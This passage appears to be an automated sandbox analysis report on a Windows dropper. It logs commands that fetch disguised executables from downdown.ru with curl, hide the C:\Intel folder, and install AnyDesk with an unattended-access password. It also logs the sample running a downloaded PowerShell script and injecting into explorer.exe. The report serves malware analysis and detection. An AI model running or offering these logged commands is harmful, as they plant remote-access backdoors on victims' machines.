    Source: C:\Intel\svchost.exeCode function: 42_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,42_2_03E34400
    Source: C:\Intel\svchost.exeCode function: 44_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,44_2_03E34400
    Source: C:\Intel\svchost.exeCode function: 45_2_03E34400 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,45_2_03E34400
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407D0E GetLogicalDriveStringsA,41_2_00407D0E
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407D5E GetSystemInfo,41_2_00407D5E
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\svchost.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: C:\Intel\AnyDesk\AnyDesk.exeThread delayed: delay time: 922337203685477
    Source: Trays.exe, 00000029.00000002.21461662298.0000000000864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
    Source: Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: curl.exe, 00000027.00000003.20416016764.000000000093A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20416177850.000000000094F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000027.00000003.20416070570.0000000000945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
    Source: curl.exe, 00000022.00000002.20310481166.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000003.20308901095.0000000000D68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
    Source: curl.exe, 00000026.00000003.20393569986.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll88t+
    Source: curl.exe, 00000023.00000003.20325704254.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000003.20385172020.000000000095F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20489003966.0000000001E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: curl.exe, 00000024.00000003.20359669497.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll88
    Source: C:\Intel\curl.exeAPI call chain: ExitProcess graph end nodegraph_34-118399
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end nodegraph_42-5384
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end nodegraph_42-5400
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Intel\svchost.exeAPI call chain: ExitProcess graph end node
    Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Intel\curl.exeCode function: 34_2_002D0FB6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,34_2_002D0FB6
    Source: C:\Intel\curl.exeCode function: 34_2_002D0FB6 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,34_2_002D0FB6
    Source: C:\Intel\curl.exeCode function: 34_2_001E1CE0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoA,VerifyVersionInfoA,VerifyVersionInfoA,LoadLibraryA,GetProcAddress,34_2_001E1CE0
    Source: C:\Intel\curl.exeCode function: 34_2_002D8705 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,34_2_002D8705
    Source: C:\Intel\dc.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Intel\curl.exeCode function: 34_2_002CBAB0 SetUnhandledExceptionFilter,34_2_002CBAB0
    Source: C:\Intel\curl.exeCode function: 34_2_002CBAE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_002CBAE1
    Source: C:\Intel\svchost.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Intel\svchost.exeNetwork Connect: 57.129.37.157 80
    Yara detected Powershell download and execute
    Source: Yara matchFile source: C:\Intel\AnyDesk\bat.bat, type: DROPPED
    Allocates memory in foreign processes
    Source: C:\Intel\dc.exeMemory allocated: C:\Windows\explorer.exe base: 690000 protect: page read and write
    Installs a global get message hook
    Source: C:\Intel\Trays\Trays.exeWindows user hook set: 0 get message C:\Intel\Trays\ShellEh6055.dll
    Source: C:\Intel\Trays\4t-min64.exeWindows user hook set: 0 get message C:\Intel\Trays\ShellEh6055x64.dll
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Intel\ 131.pdf"Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\System32\attrib.exe" +s +h C:\IntelJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpgJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /yJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>C:\Intel\rezet.cmd cd C:\Intel\Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\attrib.exe "C:\Windows\System32\attrib.exe" +s +h C:\IntelJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c echo>>C:\Intel\rezet.cmd C:\Intel\AnyDesk\bat.lnkJump to behavior
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 6 127.0.0.1Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\driver.exe http://downdown.ru/driver.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\blat.exe http://downdown.ru/blat.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\svchost.exe http://downdown.ru/svchost.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\Trays.rar http://downdown.ru/Trays.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\wol.ps1 http://downdown.ru/wol.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\dc.exe http://downdown.ru/dc.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\driver.exe C:\Intel\driver.exe x -r -ep2 -hplimpid2903392 C:\Intel\Trays.rar C:\Intel\ /yJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\Trays\Trays.exe "C:\Intel\Trays\Trays.exe" -trayJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\svchost.exe svchost.exe --install C:\Intel\AnyDeskJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\curl.exe C:\Intel\curl.exe -o C:\Intel\AnyDesk\bat.bat http://downdown.ru/bat.jpgJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intel\AnyDesk\bat.bat" "Jump to behavior
    Source: C:\Intel\Trays\Trays.exeProcess created: C:\Intel\Trays\4t-min64.exe "C:\Intel\Trays\4t-min64.exe" "C:\Intel\Trays\ShellEh6055x64.dll"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo QWERTY1234566 "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\AnyDesk\AnyDesk.exe AnyDesk.exe --set-password _unattended_access
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intel\dc.exe C:\Intel\dc.exe /D
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -standby-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -change -hibernate-timeout-ac 0
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg -h off
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -executionpolicy remotesigned -File C:\Intel\AnyDesk\wol.ps1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Intel\dc.exe "C:\Intel\dc.exe" /SYS 1
    Source: C:\Intel\Trays\Trays.exeCode function: 41_2_00407B2E SetSecurityDescriptorDacl,41_2_00407B2E
    Source: Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
    Source: Trays.exe, Trays.exe, 00000029.00000002.21467718877.0000000004AA1000.00000020.00000001.01000000.0000000A.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWnd
    Source: Trays.exe, Trays.exe, 00000029.00000002.21467718877.0000000004AA1000.00000020.00000001.01000000.0000000A.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Progman
    Source: Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Progmanidge
    Source: 4t-min64.exe, 0000002B.00000002.21462603508.0000000010019000.00000004.00000001.01000000.0000000D.sdmp, 4t-min64.exe, 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmp, 4t-min64.exe, 0000002B.00000000.20439375631.0000000000438000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndf
    Source: Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndU
    Source: Trays.exe, 00000029.00000002.21467718877.0000000004AA1000.00000020.00000001.01000000.0000000A.sdmp, svchost.exe, 0000002A.00000002.20538811069.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, svchost.exe, 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndSysPagerU
    Source: Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager`
    Source: 4t-min64.exe, 0000002B.00000002.21462702873.000000001001A000.00000008.00000001.01000000.0000000D.sdmpBinary or memory string: CabinetWClassShell_TrayWndSysPager
    Source: Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWndU
    Source: Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndI1
    Source: C:\Intel\curl.exeCode function: IsValidCodePage,GetLocaleInfoW,34_2_002D65B9
    Source: C:\Intel\curl.exeCode function: EnumSystemLocalesW,34_2_002D682D
    Source: C:\Intel\curl.exeCode function: EnumSystemLocalesW,34_2_002D686D
    Source: C:\Intel\curl.exeCode function: EnumSystemLocalesW,34_2_002D68EA
    Source: C:\Intel\curl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_002D696D
    Source: C:\Intel\curl.exeCode function: GetLocaleInfoW,34_2_002D6B62
    Source: C:\Intel\curl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_002D6C8C
    Source: C:\Intel\curl.exeCode function: GetLocaleInfoW,34_2_002D6D39
    Source: C:\Intel\curl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_002D6DA3
    Source: C:\Intel\curl.exeCode function: EnumSystemLocalesW,34_2_002D7148
    Source: C:\Intel\curl.exeCode function: GetLocaleInfoW,34_2_002D7185
    Source: C:\Intel\Trays\Trays.exeCode function: GetLocaleInfoA,41_2_00407CF6
    Source: C:\Intel\Trays\Trays.exeCode function: GetLocaleInfoA,41_2_00407CFE
    Source: C:\Intel\Trays\Trays.exeCode function: GetLocaleInfoW,41_2_00407D06
    Source: C:\Intel\Trays\Trays.exeCode function: EnumSystemLocalesA,41_2_00407BDE
    Source: C:\Intel\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,42_2_03E345D8
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,42_2_03E36AE0
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,42_2_03E36A94
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,42_2_03E349F4
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,GetACP,42_2_03E37C38
    Source: C:\Intel\Trays\4t-min64.exeCode function: GetLocaleInfoA,43_2_00416640
    Source: C:\Intel\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,44_2_03E345D8
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,44_2_03E36AE0
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,44_2_03E36A94
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,44_2_03E349F4
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,GetACP,44_2_03E37C38
    Source: C:\Intel\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,45_2_03E345D8
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,45_2_03E36AE0
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,45_2_03E36A94
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,45_2_03E349F4
    Source: C:\Intel\svchost.exeCode function: GetLocaleInfoA,GetACP,45_2_03E37C38
    Source: C:\Intel\AnyDesk\AnyDesk.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Source: C:\Intel\AnyDesk\AnyDesk.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Intel\Trays\Trays.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\Trays\Trays.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\Trays\Trays.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\Trays\Trays.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\Trays\Trays.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\AnyDesk\AnyDesk.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Intel\AnyDesk\AnyDesk.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
